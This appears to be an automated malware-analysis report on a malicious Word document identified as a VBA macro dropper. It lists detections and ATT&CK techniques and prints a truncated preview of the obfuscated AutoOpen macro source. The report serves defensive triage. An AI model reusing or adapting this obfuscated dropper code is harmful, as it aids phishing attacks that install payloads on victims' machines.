MALICIOUS
Risk Score: 204
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicating it is likely designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6459108-0' further supports its role as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6459108-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6459108-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86648 bytes |

SHA-256: f8a6c4a410012873f16038441ea833e2512740c058314d39d66d41dfcec03b24

Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "izSlTImrYi"
Sub FpDUOuOFbMf()
On Error Resume Next
While tmXvLfVTSi < DqLMQE
Set GfzAAqh = AiTuHMDUYwv
aLDOOaj = 9941430 + Round(CiwAOFzjtm) - 6337029 * Cos(2718780) / fmAYXzAWmN + Chr(rmucimZK)
DzAVttGDofL = wvjQOpD / zGQUiIcLXzH
Wend
Select Case Wjbimii
Case 5743566
zhHCFtrNLUwWb = whfqlRufqXw
STwijLZrBZJSY = 2972342
Case 7111496
LcLquzfBGosMwR = jDNaXPhlkwkhX
NSVjzTOMI = Rnd(9565036)
Case 4167263
zXvSMvjiaOLp = Atn(2616202)
iratKPIdtVX = Fix(6233450 + 9737911 * 9666424 * WvPEjSKpSj)
End Select
For zpzzHjSPpWmO = 7518782 To jTiZvj
lFDTvkiPUBHJVR = 3628325 - uOqNiIGjjcw
Select Case wfPXD
Case 8440232
jtfLwoA = ChrW(UiERoNnkL - CSng(SNcwT))
TmbRomkGiFjm = CuZinlF
Case 5407405
KpKvESk = ChrB(kkZssJMiji)
wniiBVJKtfoNO = 2059000
End Select
bmHshS = Sitn - 4186572
For VwNVK = NzGDLiYbLJZ To 9020099
rwvXKh = (7002505 * 6597705 + boAbcmNjo * Sin(zaffiJDjjAbzTn - CDbl(iBZaCnZ) * 388622 * XSDjBlNiVZvh) / 2323754 * CLng(3582526 - CDate(OHBAiwd)) / NQwlnFlMZ + 4687923 / (IPGTfwmwctrdR / MLumYTotzpS - AZYjN / Int(4265955 - Round(TKzIoW) + 459493 / 9211628)))
Next
Next
End Sub
Function wPYaHFLfWdUmB()
On Error Resume Next
inMqjJ = "GzPDVcStITqXNwPlnEzNBrrPSwlRqF"
GLSvnjvUik = GBbCtb = (7309551 * 7503123 + GclaCKLjaRS * Sin(OKIntrriK - CDbl(aDfNP) * 4883469 * OZYFMCjZoFzspX) / 6011767 * CLng(2186954 - CDate(srTPAjuEXDBi)) / oumiMstQBHbNF + 7317127 / (pVivrrUYFiOpd / pzfrt - CGGLmRXr / Int(6913244 - Round(BuzAPBYFqDUWj) + 77828 / 9680498)))
UwbKDr = PQMHw = (4317887 * 2244676 + riOTIaTdo * Sin(jTrdkna - CDbl(AqwjaGNjB) * 1396768 * cvfjcIhmEw) / 3187836 * CLng(6806437 - CDate(hTTfLljZjWWVY)) / IIGYYMw + 2367580 / (BkOVDAWc / HFzHmiXQbFv - JNDwYiwXs / Int(4403596 - Round(VBRuwQcYKumOT) + 2200204 / 243532)))
HVQTNwTjVbP = iuivbdfghnkjgyugjn(inMqjJ, 19, 7)
vkOtkYaVb = "ilTjQmViMqJOOXPtmq&wo=%2rav% tGnlARb"
jPJCDvpbkb = aBDtMiwHqHhoqn = (9395284 * 5867776 + SLYLG * Sin(UJBPiNjhVIfR - CDbl(tMKGHj) * 8258327 * rFJHizGqZH) / 7830914 * CLng(3771434 - CDate(jjKORtJ)) / MjLWqkpIER + 5997371 / (LdDrHvOa / vAqzsKczrpmhC - YwlrPQiUqJ / Int(762695 - Round(GjSHV) + 6057564 / 6781102)))
FBQIfSNd = QfUYwaNINbs = (6620753 * 1839674 + ftWEwJIbKhtqEw * Sin(kTGzTOsdMto - CDbl(ZHOQV) * 8550830 * AZlRjZ) / 5051601 * CLng(7917766 - CDate(nfHWRccIl)) / qjmPJKKGjTvQ + 4637797 / (wvGzBaYsZXqhmS / wfGflBYOKbHW - qWZXHJaV / Int(4166928 - Round(GLLzJOYcXr) + 3893110 / 7493393)))
AcwtjiTPI = iuivbdfghnkjgyugjn(vkOtkYaVb, 7, 12)
lrQNwnAUM = "Dqo%4rav%!!%3rav%!nzZYJbSbqFWMnokOzknoAZJp"
bZTdUnIQW = AtvSoQk = (6201411 * 3582872 + ZfGBIUR * Sin(JsQKnvJhFhk - CDbl(pMlMvmPJVWRY) * 5538549 * ZTYZNbtZO) / 4977991 * CLng(9204470 - CDate(GzJGLDviWMtuG)) / FHMmashQW + 8121078 / (fUJuQz / QFjQAOL - cwAMZiS / Int(8319509 - Round(mMczDHqcT) + 9585853 / 6111330)))
oDijGw = lkFPiiAppHz = (5240563 * 2308334 + jPJQiMcn * Sin(DVMMzq - CDbl(hRffrNvzqzSB) * 6398508 * PBnnYaSCTS) / 1216137 * CLng(9726347 - CDate(BuWRCzBZjv)) / YVUMZiuaFdo + 3830213 / (ZZQUfzMZs / uCUiPCfFjFGO - GGcoY / Int(6024623 - Round(zNazscjjuijHj) + 6993820 / 5028169)))
ZrosSih = iuivbdfghnkjgyugjn(lrQNwnAUM, 25, 15)
upFTJhwLPn = "AIGKzlcfHsBhRONhUUOdIes&&p=%1rav%r"
NXUZPzr = dtkpvSzdCjzjI = (3691461 * 5254761 + DjRzupq * Sin(zVfBjhOEwSfFq - CDbl(rCSPvd) * 2041694 * kHqVWFZ) / 465805 * CLng(9707918 - CDate(DrsanvwUSvip)) / VUtoOjiuMijk + 4545801 / (LKJivTs / wQRPW - aLPfuUUA / Int(5494929 - Round(LVTtrJJp) + 2963396 / 6903001)))
fSNlYo = KIQmVvTWcXwJ = (2383205 * 3904702 + SDqDr * Sin(itTaAzK - CDbl(HbAnjQDwtYYB) * 5803441 * sMLHYrqFzLsabO) / 9539
... (truncated)